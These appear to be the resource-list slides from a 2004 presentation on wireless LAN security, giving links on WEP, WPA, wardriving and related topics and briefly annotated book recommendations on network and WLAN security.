•WEP Specifications: http://standards.ieee.org/getieee802/download/802.11-1999.pdf
•WEP Insecurity: http://www.cs.rice.edu/~astubble/wep/wep_attack.html
•WPA: http://www.weca.net/OpenSection/pdf/Wi-Fi_Protected_Access_Overview.pdf
•Wardriving: http://www.wardriving.com ; www.sans.org/rr/papers/68/174.pdf
•Netstumbler: http://www.netstumbler.com
•Wireless Glossary: http://www.devx.com/wireless/Door/11333
•Build your own Cantenna: http://www.turnpoint.net/wireless/cantennahowto.html
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Online Resources
Advanced WLAN Security/Continuing Security Education
•SANS
http://www.sans.org
•Cool list of WLAN Security Links: http://is-it-true.org/pt/ptips23.shtml
•Google it: search Google for “WLAN security” and/or “WiFi® security”
•Still More whitepapers: http://www.wlana.org/learning_center.html
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Online Resources
AFH Topics
•People are stupid: Wireless Equivalent Privacy:
http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Wireless+Equivalent+Privacy%22&btnG=Google+Search
•People are stupid 2: Wireless Encryption Protocol:
http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=%22Wireless+Encryption+Protocol%22
•HAARP: http://www.haarp.alaska.edu/haarp/ ; http://www.vs.afrl.af.mil/Factsheets/haarp.html
•ECHELON: http://www.europarl.eu.int/tempcom/echelon/ pdf/rapport_echelon_en.pdf
•TEMPEST: http://www.cwrl.utexas.edu/~benjamin/316kfall/316ktexts/tempest1.html
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Offline Resources
Books/Articles: Computer Security Essentials
Skoudis, Ed, Counterhack, Upper Saddle River, NJ: Prentice
Hall PTR 2002. ISBN 0-13-033273-9 (amazing book! dozens of
black-hat techniques with countermeasures)
Cheswick WR, Bellovin SM, Firewalls and Internet Security:
Repelling the Wily Hacker, New York: Addison-Wesley
Publishing Company 1994. ISBN 0-201-63357-4 (a classic)
Chapman, D. Brent and Zwicky, Elizabeth D., Building
Internet Firewalls, Sebastopol, CA: O'Reilly & Associates, 1995.
ISBN 1-156592-124-0 (first edition includes excellent appendix
on basics of ISO/OSI TCP/IP stack)
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Offline Resources
Books/Articles: WLAN Security
Duntemann J, Jeff Duntemann’s Drive-by WiFi Guide, Scottsdale:
Paraglyph Press, 2003. ISBN 1-932111-74-3 (very readable &
entertaining; most practical 3-space reference thus far)
Peikari C, Fogie S, Maximum Wireless Security, Indianapolis: Sams
Publishing, 2003. ISBN 0-672-32488-1 (contains some errors [er,
Wireless Equivalent Privacy? To paraphrase the song, 1/3 ain’t good.])
Edney J, Arbaugh WA, Real 802.11 Security: WiFi Protected Access
and 802.11i, Boston (etc.): Addison-Wesley, 2004 (cool time-travel
aspect of copyright [to make it seem more current]; almost
incomprehensible at times, but good reference)
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV